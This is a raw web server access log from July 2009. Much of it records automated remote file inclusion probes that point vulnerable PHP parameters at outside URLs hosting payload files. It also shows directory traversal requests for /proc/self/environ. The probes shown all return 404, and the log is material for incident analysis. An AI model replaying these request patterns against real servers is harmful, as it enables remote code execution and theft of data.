79.174.68.88 - - [17/Jul/2009:01:42:14 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:14 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:14 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:16 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:20 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:22 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:22 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:22 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:31 -0400] "GET /logs/access_log.Q109070300%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:32 -0400] "GET /logs/access_log.Q109070300%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:42:36 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.30.161.230 - - [17/Jul/2009:01:42:30 -0400] "GET /logs/access_log.Q109060700 HTTP/1.0" 200 2068562 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [17/Jul/2009:01:43:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.174.68.88 - - [17/Jul/2009:01:43:32 -0400] "GET /logs/access_log.Q109070700/xGB.php?act=admin&do=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:43:32 -0400] "GET /xGB.php?act=admin&do=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:43:32 -0400] "GET /logs/xGB.php?act=admin&do=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:43:37 -0400] "GET /logs/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:43:37 -0400] "GET /logs/access_log.Q109070800%20%20/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:43:37 -0400] "GET /senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
151.1.153.1 - - [17/Jul/2009:01:43:39 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
124.0.139.129 - - [17/Jul/2009:01:43:46 -0400] "GET /logs/access_log.Q109052400%20%20//write.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:44:04 -0400] "GET /logs/access_log.Q109051100%20%20/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jul/2009:01:44:15 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.812"
209.172.33.230 - - [17/Jul/2009:01:44:15 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 260 "-" "libwww-perl/5.812"
209.172.33.230 - - [17/Jul/2009:01:44:15 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 287 "-" "libwww-perl/5.812"
209.172.33.230 - - [17/Jul/2009:01:44:15 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 287 "-" "libwww-perl/5.812"
79.174.68.88 - - [17/Jul/2009:01:44:29 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:44:29 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:44:29 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:44:31 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:44:31 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:44:31 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:44:43 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:44:44 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:44:44 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:44:44 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:44:52 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.64.67.185 - - [17/Jul/2009:01:44:53 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
69.64.67.185 - - [17/Jul/2009:01:44:53 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
69.64.67.185 - - [17/Jul/2009:01:44:54 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
69.64.67.185 - - [17/Jul/2009:01:44:54 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
79.174.68.88 - - [17/Jul/2009:01:44:56 -0400] "GET /xGB.php?act=admin&do=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:44:56 -0400] "GET /logs/xGB.php?act=admin&do=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:01:44:56 -0400] "GET /logs/access_log.Q109070700/xGB.php?act=admin&do=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:45:02 -0400] "GET /logs/access_log.Q109070300%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Jul/2009:01:45:11 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Jul/2009:01:45:11 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
76.172.214.172 - - [17/Jul/2009:01:45:39 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "http://sz0094.wc.mail.comcast.net/zimbra/mail" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
79.174.68.88 - - [17/Jul/2009:01:45:47 -0400] "GET /logs/access_log.Q109070700%20%20/xGB.php?act=admin&do=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:45:54 -0400] "GET /logs/access_log.Q109051100%20%20/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
88.66.166.22 - - [17/Jul/2009:01:46:23 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
79.174.68.88 - - [17/Jul/2009:01:46:45 -0400] "GET /logs/access_log.Q109070700%20%20/xGB.php?act=admin&do=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:46:59 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:46:59 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:47:01 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:47:17 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:01:48:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.95.107.191 - - [17/Jul/2009:01:48:34 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
207.210.89.18 - - [17/Jul/2009:01:49:12 -0400] "GET /logs/error_log.Q109060300//raid/authentication/smf/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
207.210.89.18 - - [17/Jul/2009:01:49:12 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
207.210.89.18 - - [17/Jul/2009:01:49:12 -0400] "GET /logs/error_log.Q109060300//raid/authentication/smf/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 259 "-" "XXXXXX"
207.210.89.18 - - [17/Jul/2009:01:49:12 -0400] "GET /logs/error_log.Q109060300//raid/authentication/smf/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 259 "-" "XXXXXX"
207.210.89.18 - - [17/Jul/2009:01:49:14 -0400] "GET //raid/authentication/smf/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
207.210.89.18 - - [17/Jul/2009:01:49:14 -0400] "GET /logs//raid/authentication/smf/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
207.210.89.18 - - [17/Jul/2009:01:49:14 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
207.210.89.18 - - [17/Jul/2009:01:49:14 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
207.210.89.18 - - [17/Jul/2009:01:49:14 -0400] "GET //raid/authentication/smf/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
207.210.89.18 - - [17/Jul/2009:01:49:14 -0400] "GET /logs//raid/authentication/smf/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 238 "-" "XXXXXX"
207.210.89.18 - - [17/Jul/2009:01:49:14 -0400] "GET /logs//raid/authentication/smf/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 238 "-" "XXXXXX"
207.210.89.18 - - [17/Jul/2009:01:49:14 -0400] "GET //raid/authentication/smf/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
72.30.161.230 - - [17/Jul/2009:01:49:40 -0400] "GET /images/_notes/ HTTP/1.0" 200 15469 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
151.1.153.1 - - [17/Jul/2009:01:50:13 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
151.1.153.1 - - [17/Jul/2009:01:50:14 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
151.1.153.1 - - [17/Jul/2009:01:50:14 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
87.106.245.84 - - [17/Jul/2009:01:50:20 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:50:20 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:50:20 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:50:21 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:50:22 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:50:24 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:50:28 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:50:31 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
151.1.153.1 - - [17/Jul/2009:01:50:38 -0400] "GET /logs/access_log.Q109070600//includes/todofleetcontrol.php?xnova_root_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
151.1.153.1 - - [17/Jul/2009:01:50:38 -0400] "GET //includes/todofleetcontrol.php?xnova_root_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
151.1.153.1 - - [17/Jul/2009:01:50:39 -0400] "GET /logs//includes/todofleetcontrol.php?xnova_root_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
151.1.153.1 - - [17/Jul/2009:01:50:39 -0400] "GET /logs/error_log.Q109070600//includes/todofleetcontrol.php?xnova_root_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
24.121.100.169 - - [17/Jul/2009:01:50:43 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
87.106.245.84 - - [17/Jul/2009:01:50:53 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:50:53 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:50:53 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.183.154.122 - - [17/Jul/2009:01:50:53 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.106.245.84 - - [17/Jul/2009:01:50:59 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:01:51:08 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://aboutav.com//id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:01:51:08 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://aboutav.com//id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:01:51:08 -0400] "GET /logs/access_log.Q109070200/ncaster/admin/addons/archive/archive.php?adminfolder=http://aboutav.com//id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.68.70 - - [17/Jul/2009:01:51:23 -0400] "GET /images/items/index3_sinus_over.jpg HTTP/1.1" 200 1089 "-" "Googlebot-Image/1.0"
87.106.245.84 - - [17/Jul/2009:01:51:31 -0400] "GET /config.php?path_to_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:51:31 -0400] "GET /logs/config.php?path_to_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:51:31 -0400] "GET /logs/access_log.Q109053000%20%20/config.php?path_to_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:51:34 -0400] "GET /logs/access_log.Q109070300%20%20/config.php?path_to_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
204.30.3.225 - - [17/Jul/2009:01:51:47 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
204.30.3.225 - - [17/Jul/2009:01:51:54 -0400] "GET /logs/access_log.Q109062100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:01:51:59 -0400] "GET /logs/access_log.Q109070600/ncaster/admin/addons/archive/archive.php?adminfolder=http://aboutav.com//id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
151.1.153.1 - - [17/Jul/2009:01:52:00 -0400] "GET /logs/error_log.Q109060900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
119.93.90.155 - - [17/Jul/2009:01:52:08 -0400] "GET /logs/access_log.Q109070800/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:52:42 -0400] "GET /logs/access_log.Q109051100/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:01:53:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.245.84 - - [17/Jul/2009:01:53:29 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:53:30 -0400] "GET /logs/access_log.Q109070300/config.php?path_to_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:53:34 -0400] "GET /logs/access_log.Q109070800/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.55.220.215 - - [17/Jul/2009:01:53:51 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/4.0"
65.55.220.215 - - [17/Jul/2009:01:53:51 -0400] "GET /images/items/EcOm/conform_thumb.jpg HTTP/1.1" 200 1623 "-" "Mozilla/4.0"
218.27.203.107 - - [17/Jul/2009:01:53:52 -0400] "GET /logs/access_log.Q109051700%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:53:59 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:53:59 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:53:59 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:54:24 -0400] "GET /logs/access_log.Q109051100/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:54:24 -0400] "GET /logs/error_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Jul/2009:01:54:41 -0400] "GET /logs/error_log.Q109061000%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
